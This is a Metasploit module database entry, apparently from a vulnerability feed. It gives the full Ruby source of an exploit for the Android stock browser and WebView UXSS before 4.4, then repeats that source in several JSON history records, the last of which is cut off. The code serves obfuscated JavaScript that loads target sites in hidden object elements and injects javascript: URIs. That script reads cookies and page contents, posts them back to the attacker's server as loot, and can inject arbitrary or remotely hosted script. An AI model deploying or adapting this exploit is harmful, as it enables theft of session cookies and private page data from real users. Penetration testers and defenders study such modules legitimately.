ID MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and in Android apps that embed the WebView component when running on Android versions before 4.4. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options cannot be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
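# Auxiliary module that serves a test page for the AOSP stock browser /
# WebView UXSS described in 'Description' below and records what a
# vulnerable client reports back.
#
# Request flow implemented here:
#   * Any non-POST request receives an HTML page whose script creates one
#     <object> element per entry in TARGET_URLS.
#   * POST requests are treated as JSON reports from that page and are
#     stored as loot by #collect_data.
#
# Notes for defenders, taken from what this file states and does:
#   * Affected clients are the stock browser and WebView-embedding apps on
#     Android before 4.4; target pages that send X-Frame-Options are not
#     exposed (see 'Description').
#   * The page script reads document.cookie, location.href and
#     document.body.innerHTML. document.cookie does not include HttpOnly
#     cookies, but the page body is still read.
#   * 'References' links a WebKit changeset and an Android WebKit commit,
#     presumably the upstream fixes -- confirm against those links.
#
# Multi-line string bodies below are kept flush-left on purpose so the text
# the module emits is unchanged.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::JSObfu
  include Msf::Auxiliary::Report

  # Registers module metadata and the three user-settable options.
  #
  # @param info [Hash] metadata passed in by the framework and merged via
  #   update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
      'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
Some sample UXSS scripts are provided in data/exploits/uxss.
},
      'Author' => [
        'Rafay Baloch', # Original discovery, disclosure
        'joev' # Metasploit module
      ],
      'License' => MSF_LICENSE,
      'Actions' => [
        [ 'WebServer' ]
      ],
      'PassiveActions' => [
        'WebServer'
      ],
      'References' => [
        [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
        [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
        [ 'URL', 'http://trac.webkit.org/changeset/96826' ]
      ],
      'DefaultAction' => 'WebServer',
      'DisclosureDate' => "Oct 4 2014"
    ))

    register_options([
      OptString.new('TARGET_URLS', [
        true,
        "The comma-separated list of URLs to steal.",
        'http://example.com'
      ]),
      OptString.new('CUSTOM_JS', [
        false,
        "A string of javascript to execute in the context of the target URLs.",
        ''
      ]),
      OptString.new('REMOTE_JS', [
        false,
        "A URL to inject into a script tag in the context of the target URLs.",
        ''
      ])
    ])
  end

  # HTTP request handler for the module's web server.
  #
  # POST requests are handed to #collect_data and answered with an empty
  # HTML body. Every other method is answered with the test page: the script
  # is passed through js_obfuscate and embedded in a minimal HTML document.
  #
  # @param cli the client connection the response is written to
  # @param request the incoming HTTP request (method, uri and body are read)
  def on_request_uri(cli, request)
    print_status("Request '#{request.method} #{request.uri}'")

    if request.method.downcase == 'post'
      collect_data(request)
      send_response_html(cli, '')
    else
      # TARGET_URLS is split on commas only; entries are not trimmed.
      domains = datastore['TARGET_URLS'].split(',')

      # The target list and the operator-supplied script are embedded as
      # base64 so their contents cannot break the surrounding JS quoting.
      script = js_obfuscate <<-EOS
var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}"));
targets.forEach(function(target, i){
var obj = document.createElement('object');
obj.setAttribute('data', target);
obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');
obj.onload = function() {
obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+
'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
'));}void(0);';
obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
};
document.body.appendChild(obj);
});
window.addEventListener('message', function(e) {
var data = JSON.parse(e.data);
var x = new XMLHttpRequest;
x.open('POST', window.location, true);
x.send(e.data);
}, false);
      EOS

      html = <<-EOS
<html>
<body>
<script>
#{script}
</script>
</body>
</html>
      EOS

      print_status("Sending initial HTML ...")
      send_response_html(cli, html)
    end
  end

  # Parses a POSTed report and stores the raw request body as loot.
  #
  # The body is supplied by whichever client reached the listener, so it is
  # validated before use: it must parse as JSON and the parsed value must be
  # an object. Other JSON values (null, arrays, numbers) are rejected with
  # the same error message instead of raising inside the handler.
  #
  # @param request the POST request whose body is expected to be a JSON
  #   object carrying a 'url' key
  # @return [void]
  def collect_data(request)
    begin
      response = JSON.parse(request.body)
    rescue JSON::ParserError
      print_error "Invalid JSON request."
      return
    end

    unless response.is_a?(Hash)
      print_error "Invalid JSON request."
      return
    end

    url = response['url']
    return unless url

    # NOTE(review): url is client-controlled and is echoed to the operator
    # console and used in the loot name below -- confirm the framework
    # sanitizes both before relying on either.
    file = store_loot("android.client", "text/plain", cli.peerhost, request.body, "aosp_uxss_#{url}", "Data pilfered from uxss")
    print_good "Collected data from URL: #{url}"
    print_good "Saved to: #{file}"
  end

  # @return [String] the REMOTE_JS loader snippet (possibly empty) followed
  #   by the CUSTOM_JS option value
  def custom_js
    rjs_hook + datastore['CUSTOM_JS']
  end

  # Builds the snippet that appends a <script src=REMOTE_JS> element.
  #
  # @return [String] the loader snippet, or '' when REMOTE_JS is not set
  def rjs_hook
    remote_js = datastore['REMOTE_JS']
    return '' unless remote_js.present?

    "var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "
  end

  # Entry point for the auxiliary module; starts the web server through the
  # mixin's exploit method.
  def run
    exploit
  end
end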
{"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-11-02T01:15:34", "history": [{"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. 
Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/gather/android_object_tag_webview_uxss", "reporter": "Rapid7", "references": ["http://trac.webkit.org/changeset/96826", "http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef"], "cvelist": [], "lastseen": "2017-07-02T23:30:18", "history": [], "viewCount": 31, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\n\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-07-02T23:30:18", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", 
"description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/gather/android_object_tag_webview_uxss", "reporter": "Rapid7", "references": ["http://trac.webkit.org/changeset/96826", "http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef"], "cvelist": [], "lastseen": "2017-07-24T20:00:47", "history": [], "viewCount": 32, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-07-24T20:00:47", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:29:35", "history": [], "viewCount": 47, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-08-21T15:29:35", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-26T23:38:39", "history": [], "viewCount": 47, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-10-26T23:38:39", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-27T01:39:40", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2017-10-27T01:39:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions 